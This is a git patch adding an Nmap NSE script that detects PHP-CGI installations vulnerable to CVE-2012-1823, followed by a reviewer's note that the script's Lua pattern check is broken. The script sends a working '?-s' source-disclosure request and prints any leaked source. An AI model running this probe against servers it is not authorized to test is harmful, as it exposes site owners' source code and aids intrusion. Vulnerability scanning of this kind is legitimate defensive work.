From 96c6cd7780c306a38e856633f1dc96b368070c88 Mon Sep 17 00:00:00 2001
From: paulino
Date: Tue, 8 May 2012 05:56:04 +0000
Subject: [PATCH] Adds http-vuln-cve2012-1823.nse - This script detects PHP-CGI installations that are vulnerable to CVE-2012-1823. This vulnerability is critical and it allows attackers to retrieve source code and execute code remotely.
---
 scripts/http-vuln-cve2012-1823.nse | 96 ++++++++++++++++++++++++++++++
 scripts/script.db | 1 +
 2 files changed, 97 insertions(+)
 create mode 100644 scripts/http-vuln-cve2012-1823.nse
diff --git a/scripts/http-vuln-cve2012-1823.nse b/scripts/http-vuln-cve2012-1823.nse
new file mode 100644
index 000000000..0f829dbe4
--- /dev/null
+++ b/scripts/http-vuln-cve2012-1823.nse
@@ -0,0 +1,96 @@
+description = [[
+Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This vulnerability is critical and it allows attackers to retrieve source code and execute code remotely.
+
+The script works by appending "?-s" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern "<?" to detect
+vulnerable installations.
+
+TODO:
+-Improve detection mechanism ( Execute certain payload and look for it in the response to confirm exploitability)
+-Add exploitation script
+]]
+
+---
+-- @usage
+-- nmap -sV --script http-vuln-cve2012-1823
+-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php
+-- @output
+-- PORT STATE SERVICE REASON
+-- 80/tcp open http syn-ack
+-- | http-vuln-cve2012-1823:
+-- | VULNERABLE:
+-- | PHP-CGI Remote code execution and source code disclosure
+-- | State: VULNERABLE (Exploitable)
+-- | IDs: CVE:2012-1823
+-- | Description:
+-- | According to PHP's website, "PHP is a widely-used general-purpose
+-- | scripting language that is especially suited for Web development and
+-- | can be embedded into HTML." When PHP is used in a CGI-based setup
+-- | (such as Apache's mod_cgid), the php-cgi receives a processed query
+-- | string parameter as command line arguments which allows command-line
+-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,
+-- | which can be exploited to disclose source code and obtain arbitrary
+-- | code execution.
+-- | Disclosure date: 2012-05-3
+-- | Extra information:
+-- | Proof of Concept:/index.php?-s
+-- | References:
+-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
+-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823
+-- |_ http://ompldr.org/vZGxxaQ
+--
+-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php
+---
+
+author = "Paulino Calderon"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln","intrusive"}
+
+require "shortport"
+require "http"
+require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/index.php"
+
+ local vuln = {
+ title = 'PHP-CGI Remote code execution and source code disclosure',
+ state = vulns.STATE.NOT_VULN, -- default
+ IDS = {CVE = '2012-1823'},
+ description = [[
+According to PHP's website, "PHP is a widely-used general-purpose
+scripting language that is especially suited for Web development and
+can be embedded into HTML." When PHP is used in a CGI-based setup
+(such as Apache's mod_cgid), the php-cgi receives a processed query
+string parameter as command line arguments which allows command-line
+switches, such as -s, -d or -c to be passed to the php-cgi binary,
+which can be exploited to disclose source code and obtain arbitrary
+code execution.]],
+ references = {
+ 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',
+ 'http://ompldr.org/vZGxxaQ',
+ },
+ dates = {
+ disclosure = {year = '2012', month = '05', day = '3'},
+ },
+ }
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ local reg_session = http.get(host, port, uri)
+ if reg_session and reg_session.status == 200 then
+ if string.match(reg_session.body, "<?") then
+ stdnse.print_debug(1, "Pattern exists on file! We can't determine if this page is vulnerable. Try with a different URI.")
+ return
+ end
+ end
+
+ local open_session = http.get(host, port, uri.."?-s")
+ if open_session and open_session.status == 200 then
+ if string.match(open_session.body, "<?") then
+ vuln.state = vulns.STATE.EXPLOIT
+ vuln.extra_info=string.format("Proof of Concept:%s\n%s", uri.."?-s", open_session.body)
+ return vuln_report:make_output(vuln)
+ end
+ end
+end
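Review bot: The pattern "<?" handed to string.match in both body checks inside action is a Lua pattern in which `?` makes the `<` optional, so it matches the empty string at position 1 of any body; every 200 response therefore trips the first check and returns before the "?-s" request is sent, and the second check would accept any body at all. Use a plain search instead, `if string.find(reg_session.body, "<?", 1, true) then` and the same for open_session, or escape it as "<%?". For the "?-s" response also confirm what the highlighted source really contains before relying on a literal "<?", since syntax-highlighted output may HTML-encode that marker — I cannot verify that from the hunk. Separately, stdnse is called but not pulled in next to shortport/http/vulns; add `require "stdnse"` unless this NSE version exposes it as a global. Copying the whole response body into extra_info also writes the disclosed source verbatim into scan output, so a bounded prefix would keep reports manageable.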
diff --git a/scripts/script.db b/scripts/script.db
index d2350da85..92401ea1a 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -169,6 +169,7 @@ Entry { filename = "http-vuln-cve2009-3960.nse", categories = { "exploit", "intr
 Entry { filename = "http-vuln-cve2010-2861.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-cve2011-3192.nse", categories = { "safe", "vuln", } }
 Entry { filename = "http-vuln-cve2011-3368.nse", categories = { "intrusive", "vuln", } }
+Entry { filename = "http-vuln-cve2012-1823.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }
 Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } }
 Entry { filename = "http-wordpress-enum.nse", categories = { "auth", "intrusive", "vuln", } }